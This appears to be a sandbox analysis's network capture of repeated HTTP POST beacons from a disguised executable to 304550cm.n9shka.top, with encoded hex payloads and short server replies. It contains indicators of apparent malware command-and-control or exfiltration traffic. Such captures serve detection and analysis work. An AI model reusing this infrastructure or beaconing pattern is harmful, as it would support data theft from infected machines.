                                                          Date: Sun, 08 Sep 2024 09:52:37 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          37 | 192.168.2.4 | 64727 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:38.073802948 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:38.431441069 CEST | 2532 | OUT | Data Raw: 5e 5a 59 54 5a 5f 5b 50 5c 5a 51 56 57 5d 57 55 50 58 5e 5d 54 5a 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^ZYTZ_[P\ZQVW]WUPX^]TZSATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%];)9 #08\*,3%<5,'''#>_?%?_3.#G X/9
                                                          Sep 8, 2024 11:52:38.755870104 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:38.962743044 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:38 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          38 | 192.168.2.4 | 64728 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:39.092061043 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:39.447041035 CEST | 2532 | OUT | Data Raw: 5b 50 5c 56 5a 5f 5e 58 5c 5a 51 56 57 5d 57 50 50 50 5e 5a 54 5b 53 49 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [P\VZ_^X\ZQVW]WPPP^ZT[SITRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%_8-Z>+ 8Z=39,$<39+X">5_?&80[-#G X/9
                                                          Sep 8, 2024 11:52:39.785311937 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:39.991641998 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:39 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          39 | 192.168.2.4 | 64729 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:40.121556997 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:40.478424072 CEST | 2532 | OUT | Data Raw: 5e 5d 59 52 5a 5f 5e 5f 5c 5a 51 56 57 5e 57 54 50 59 5e 5d 54 5e 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^]YRZ_^_\ZQVW^WTPY^]T^SHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&/2%Z= 8]>Y3?_,#%)+5>1X<5?$$ .;#G X/5
                                                          Sep 8, 2024 11:52:40.812889099 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:41.021652937 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:40 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          40 | 192.168.2.4 | 64730 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:41.161562920 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:41.509675026 CEST | 2532 | OUT | Data Raw: 5e 5b 5c 51 5f 5e 5b 58 5c 5a 51 56 57 5a 57 55 50 5f 5e 5c 54 5e 53 47 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^[\Q_^[X\ZQVWZWUP_^\T^SGTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&,2%** 7V$>$),'T3'".><5'0_.#G X/%
                                                          Sep 8, 2024 11:52:41.846086025 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:42.048048019 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:41 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          41 | 192.168.2.4 | 64731 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:42.167792082 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:42.525207043 CEST | 2532 | OUT | Data Raw: 5e 5c 5c 53 5a 5d 5b 51 5c 5a 51 56 57 53 57 5d 50 58 5e 59 54 5b 53 43 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\SZ][Q\ZQVWSW]PX^YT[SCTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/->), 00X)X'Y&;3!==_(&,0'.;#G X/


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          42 | 192.168.2.4 | 64732 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:42.844446898 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1412
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:43.197671890 CEST | 1412 | OUT | Data Raw: 5b 5a 59 55 5f 5d 5b 51 5c 5a 51 56 57 5d 57 50 50 51 5e 5c 54 55 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [ZYU_][Q\ZQVW]WPPQ^\TUSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%/2">_?X43,=<]'/=,?T$*7#.5+&?Y34(9;#G X/9
                                                          Sep 8, 2024 11:52:43.530021906 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:43.725656986 CEST | 308 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive
                                                          Data Raw: 0d 11 25 0a 30 3f 00 03 21 10 06 0f 3d 3f 2d 12 2c 2e 24 11 3d 00 35 45 3d 0d 30 11 3e 01 36 12 3e 38 2d 45 3d 3f 24 11 20 21 02 04 27 35 28 5e 03 11 20 06 36 2e 3d 07 29 39 0b 01 3e 0f 34 1b 29 2f 01 5a 22 42 2b 0e 34 2b 38 1c 34 3b 2a 14 3f 17 00 12 2f 24 26 1d 39 0a 32 57 21 0e 2d 57 0c 12 23 09 28 2e 2b 53 34 30 29 5f 25 2d 29 12 30 25 36 5e 3e 06 07 0e 3c 16 3a 5c 25 0b 28 0c 26 3e 21 5f 3d 01 22 5f 33 39 37 5a 23 2d 24 53 2d 0c 22 54 00 3d 5c 56
                                                          Data Ascii: %0?!=?-,.$=5E=0>6>8-E=?$ !'5(^ 6.=)9>4)/Z"B+4+84;*?/$&92W!-W#(.+S40)_%-)0%6^><:\%(&>!_="_397Z#-$S-"T=\V


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          43 | 192.168.2.4 | 64733 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:42.966285944 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:43.322120905 CEST | 2532 | OUT | Data Raw: 5e 5c 59 54 5a 59 5b 5e 5c 5a 51 56 57 59 57 5d 50 50 5e 50 54 55 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\YTZY[^\ZQVWYW]PP^PTUSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%^8W:?940?)<,'1_,'#0: !(6'^9;#G X/)
                                                          Sep 8, 2024 11:52:43.654217958 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:43.792609930 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:43 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          44 | 192.168.2.4 | 64734 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:43.917943954 CEST | 295 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:44.275228977 CEST | 2532 | OUT | Data Raw: 5b 5d 5c 55 5a 58 5b 59 5c 5a 51 56 57 5a 57 51 50 5f 5e 51 54 5d 53 41 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: []\UZX[Y\ZQVWZWQP_^QT]SATRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%[/!=+40X)?3Y%<*8'7V')'#.-[)6$&$ [/;#G X/%
                                                          Sep 8, 2024 11:52:44.583265066 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:44.717046022 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:44 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          45 | 192.168.2.4 | 64735 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:44.840869904 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:45.197648048 CEST | 2532 | OUT | Data Raw: 5e 5c 5c 54 5f 5a 5e 58 5c 5a 51 56 57 5d 57 52 50 5e 5e 5c 54 55 53 44 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^\\T_Z^X\ZQVW]WRP^^\TUSDTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;"&>4 3(?7_0?6/+'(6.)?@#3$ Z9#G X/9
                                                          Sep 8, 2024 11:52:45.506228924 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:45.636684895 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          46 | 192.168.2.4 | 64736 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:45.769434929 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:46.118974924 CEST | 2532 | OUT | Data Raw: 5e 59 5c 50 5a 5f 5b 5c 5c 5a 51 56 57 52 57 5d 50 59 5e 50 54 55 53 48 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: ^Y\PZ_[\\ZQVWRW]PY^PTUSHTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[%\;":)+!0$Z*<'=[-4R':'"5?&#[&'4:;#G X/
                                                          Sep 8, 2024 11:52:46.430526972 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:46.560022116 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:45 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          47 | 192.168.2.4 | 64737 | 80.211.144.156 | 80 | 764 | C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Sep 8, 2024 11:52:46.685189009 CEST | 319 | OUT | POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:47.040894032 CEST | 2528 | OUT | Data Raw: 5b 5c 5c 54 5f 5e 5b 5a 5c 5a 51 56 57 5b 57 54 50 50 5e 5f 54 5d 53 42 54 52 42 53 57 5e 54 53 46 5e 52 41 57 5d 5f 58 5e 50 59 5c 5b 53 57 5e 55 5d 59 5d 5a 5b 58 5e 57 58 54 5f 54 50 56 54 51 5a 59 5d 5f 45 56 52 58 5e 5e 5e 5e 59 59 51 50 5c
                                                          Data Ascii: [\\T_^[Z\ZQVW[WTPP^_T]SBTRBSW^TSF^RAW]_X^PY\[SW^U]Y]Z[X^WXT_TPVTQZY]_EVRX^^^^YYQP\]WQE_@VVUP_TRWZ_ZQPY]W[U_TX^CYY@U^TZXSVZX_XPXTZQ[XW_Y\Z\UPZZ^RRQ^XPW_]\YA^U^UU_Y\\\]_QS]T^QW^\]PZZC\U[&;!.*97 V#>Z7\'?)_-'<$("X-? 3':+#G X/%
                                                          Sep 8, 2024 11:52:47.355787992 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:47.486373901 CEST | 158 | IN | HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:46 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          48  192.168.2.4  64738  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:47.606170893 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:47.962707996 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:48.303637981 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:48.436470985 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:47 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          49  192.168.2.4  64739  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:48.559653044 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          50  192.168.2.4  64740  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:48.734797001 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 1372
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:49.087934971 CEST  1372  OUT
                                                          Sep 8, 2024 11:52:49.405402899 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:49.534224033 CEST  308  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:48 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 152
                                                          Connection: keep-alive


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          51  192.168.2.4  64741  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:48.857590914 CEST  319  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Sep 8, 2024 11:52:49.212735891 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:49.531940937 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:49.663022041 CEST  158  IN  HTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sun, 08 Sep 2024 09:52:49 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 4
                                                          Connection: keep-alive
                                                          Data Raw: 3f 59 5f 5a
                                                          Data Ascii: ?Y_Z


                                                          Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                          52  192.168.2.4  64742  80.211.144.156  80  764  C:\Program Files\Microsoft\COBPewMCbcSeQUSyEIOt.exe
                                                          Timestamp  Bytes transferred  Direction  Data
                                                          Sep 8, 2024 11:52:49.794887066 CEST  295  OUT  POST /jspollgamesqldle.php HTTP/1.1
                                                          Content-Type: application/octet-stream
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34
                                                          Host: 304550cm.n9shka.top
                                                          Content-Length: 2532
                                                          Expect: 100-continue
                                                          Sep 8, 2024 11:52:50.150235891 CEST  2532  OUT
                                                          Sep 8, 2024 11:52:50.471239090 CEST  25  IN  HTTP/1.1 100 Continue
                                                          Sep 8, 2024 11:52:50.670878887 CEST  158  IN  HTTP/1.1 200 OK
